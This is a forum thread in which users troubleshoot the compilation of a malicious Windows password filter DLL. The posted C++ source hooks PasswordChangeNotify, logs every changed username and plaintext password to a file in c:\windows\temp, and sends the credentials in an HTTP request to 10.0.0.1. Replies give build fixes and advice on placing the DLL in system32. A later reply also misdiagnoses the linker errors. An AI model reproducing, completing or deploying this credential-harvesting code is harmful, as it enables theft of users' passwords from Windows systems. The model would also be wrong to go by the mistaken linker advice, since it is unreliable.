Jump to content

Ep 1505 question

kameleon

By kameleon
in Questions

 Share

Recommended Posts

kameleon Newbie

kameleon

Posted
Posted (edited)

I have been going over everything that Darren and Mubix talked about in ep1505.2 trying to get the password filters setup for testing. However I cannot for the life of me get the passfilter.cpp to compile in visual studio. I have never dealt with VS before as I come from a Linux background. I did edit the IP address and had to add the required "#include "stdafx.h" line. When I go to build it gives me an error of:

Error 1 error C2561: 'PasswordChangeNotify' : function must return a value c:\users\blah\documents\visual studio 2013\projects\passfilter\passfilter\passfilter.cpp 75 1 passfilter
Below is my passfilter.cpp
// passfilter.cpp : Defines the exported functions for the DLL application.

#include "stdafx.h"
#include "windows.h"
#include "stdio.h"
#include "WinInet.h"
#include "ntsecapi.h"

void writeToLog(const char* szString)
{
	FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
	if (NULL == pFile)
	{
		return;
	}
	fprintf(pFile, "%s\r\n", szString);
	fclose(pFile);
	return;
}



// Default DllMain implementation
BOOL APIENTRY DllMain(HANDLE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
	)
{
	OutputDebugString(L"DllMain");
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

BOOLEAN __stdcall InitializeChangeNotify(void)
{
	OutputDebugString(L"InitializeChangeNotify");
	writeToLog("InitializeChangeNotify()");
	return TRUE;
}

BOOLEAN __stdcall PasswordFilter(
	PUNICODE_STRING AccountName,
	PUNICODE_STRING FullName,
	PUNICODE_STRING Password,
	BOOLEAN SetOperation)
{
	OutputDebugString(L"PasswordFilter");
	return TRUE;
}

NTSTATUS __stdcall PasswordChangeNotify(
	PUNICODE_STRING UserName,
	ULONG RelativeId,
	PUNICODE_STRING NewPassword)
{
	FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+");
	//HINTERNET hInternet = InternetOpen(L"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
	HINTERNET hInternet = InternetOpen(L"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
	HINTERNET hSession = InternetConnect(hInternet, L"10.0.0.1", 80, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
	HINTERNET hReq = HttpOpenRequest(hSession, L"POST", L"/", NULL, NULL, NULL, 0, 0);
	char* pBuf = "SomeData";



	OutputDebugString(L"PasswordChangeNotify");
	if (NULL == pFile)
	{
		return;
	}
	fprintf(pFile, "%ws:%ws\r\n", UserName->Buffer, NewPassword->Buffer);
	fclose(pFile);
	InternetSetOption(hSession, INTERNET_OPTION_USERNAME, UserName->Buffer, UserName->Length / 2);
	InternetSetOption(hSession, INTERNET_OPTION_PASSWORD, NewPassword->Buffer, NewPassword->Length / 2);
	HttpSendRequest(hReq, NULL, 0, pBuf, strlen(pBuf));

	return 0;
}

The problem is on the 

	{
		return;
	}

line towards the bottom. Any thoughts?

Edited by kameleon
Link to comment
Share on other sites
kameleon Newbie

kameleon

Posted
  • Author
Posted

Ok, I finally got it to compile. I had to remove the lines:

 
 
 
// Default DllMain implementation
BOOL APIENTRY DllMain( HANDLE hModule, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
                     )
{
    OutputDebugString(L"DllMain");
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

and change the 

        {
		return;
	}

to

        {
		return -1;
	}

It then built correctly. I have placed it in windows/system32 folder and rebooted. But it is not writing the logfile nor is it sending the http request. What am I doing wrong?

Link to comment
Share on other sites
  • 1 month later...
cooper Newbie

cooper

Posted
Posted (edited)

As Kameleon mentioned, you need to update this bit:

    OutputDebugString(L"PasswordChangeNotify");

    if (NULL == pFile)

    {

        return;

    }

Replace "return;" with "return -1;" and things should improve.

I would recommend again removing the DllMain function...

Edited by Cooper
Link to comment
Share on other sites
  • 4 weeks later...
anonymous12345 Newbie

anonymous12345

Posted
Posted
Huh....I get this now....


Error 1 error LNK2019: unresolved external symbol __imp__InternetOpenW@20 referenced in function "long __stdcall PasswordChangeNotify(struct _LSA_UNICODE_STRING *,unsigned long,struct _LSA_UNICODE_STRING *)" (?PasswordChangeNotify@@YGJPAU_LSA_UNICODE_STRING@@K0@Z) C:\Users\Administrator\Documents\Visual Studio 2013\Projects\Win32Project3\Win32Project3\Win32Project3.obj Win32Project3

Error 2 error LNK2019: unresolved external symbol __imp__InternetConnectW@32 referenced in function "long __stdcall PasswordChangeNotify(struct _LSA_UNICODE_STRING *,unsigned long,struct _LSA_UNICODE_STRING *)" (?PasswordChangeNotify@@YGJPAU_LSA_UNICODE_STRING@@K0@Z) C:\Users\Administrator\Documents\Visual Studio 2013\Projects\Win32Project3\Win32Project3\Win32Project3.obj Win32Project3

Error 3 error LNK2019: unresolved external symbol __imp__InternetSetOptionW@16 referenced in function "long __stdcall PasswordChangeNotify(struct _LSA_UNICODE_STRING *,unsigned long,struct _LSA_UNICODE_STRING *)" (?PasswordChangeNotify@@YGJPAU_LSA_UNICODE_STRING@@K0@Z) C:\Users\Administrator\Documents\Visual Studio 2013\Projects\Win32Project3\Win32Project3\Win32Project3.obj Win32Project3

Error 4 error LNK2019: unresolved external symbol __imp__HttpOpenRequestW@32 referenced in function "long __stdcall PasswordChangeNotify(struct _LSA_UNICODE_STRING *,unsigned long,struct _LSA_UNICODE_STRING *)" (?PasswordChangeNotify@@YGJPAU_LSA_UNICODE_STRING@@K0@Z) C:\Users\Administrator\Documents\Visual Studio 2013\Projects\Win32Project3\Win32Project3\Win32Project3.obj Win32Project3

Error 5 error LNK2019: unresolved external symbol __imp__HttpSendRequestW@20 referenced in function "long __stdcall PasswordChangeNotify(struct _LSA_UNICODE_STRING *,unsigned long,struct _LSA_UNICODE_STRING *)" (?PasswordChangeNotify@@YGJPAU_LSA_UNICODE_STRING@@K0@Z) C:\Users\Administrator\Documents\Visual Studio 2013\Projects\Win32Project3\Win32Project3\Win32Project3.obj Win32Project3

Error 6 error LNK1120: 5 unresolved externals C:\Users\Administrator\Documents\Visual Studio 2013\Projects\Win32Project3\Debug\Win32Project3.dll Win32Project3
Link to comment
Share on other sites
cooper Newbie

cooper

Posted
Posted

The PasswordChangeNotify function can't be found during linking. Find the file that declares it and see why it might be left out at this stage.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...